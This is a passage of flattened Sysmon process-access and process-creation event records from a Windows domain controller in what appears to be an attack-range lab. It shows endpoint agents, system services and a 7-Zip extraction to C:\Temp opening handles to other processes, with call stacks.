Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.871{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.871{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.871{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.870{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.870{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.870{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\7-Zip\7-zip.dll+558c|C:\Program Files\7-Zip\7-zip.dll+6955|C:\Program Files\7-Zip\7-zip.dll+712e|C:\Program Files\7-Zip\7-zip.dll+7275|C:\Program Files\7-Zip\7-zip.dll+8ff3|C:\Program Files\7-Zip\7-zip.dll+c541|C:\Windows\System32\SHELL32.dll+4d8ef|C:\Windows\System32\SHELL32.dll+8f0be|C:\Windows\System32\SHELL32.dll+16c38c|C:\Windows\System32\SHELL32.dll+19ebfc|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16c630|C:\Windows\System32\SHELL32.dll+169a0e|C:\Windows\System32\SHELL32.dll+40eb1|C:\Windows\System32\SHELL32.dll+43d96|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15 154100x800000000000000040120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.859{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe22.017-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Temp\" -an -ai#7zMap18804:76:7zEvent29155C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=5AB26FFD7B3C23A796138640B1737B48,SHA256=EB775B0E8CC349032187C2329FEFCF64F5FEED4D148034C060E227ADF6D38500,IMPHASH=F5976AA5B71D78D164DDC61EA72A2DA7{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\explorer.exe"C:\Windows\Explorer.EXE" /NOUACCHECK 10341000x800000000000000040119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.783{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.776{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.266{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.265{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.187{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.187{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.187{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.173{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program 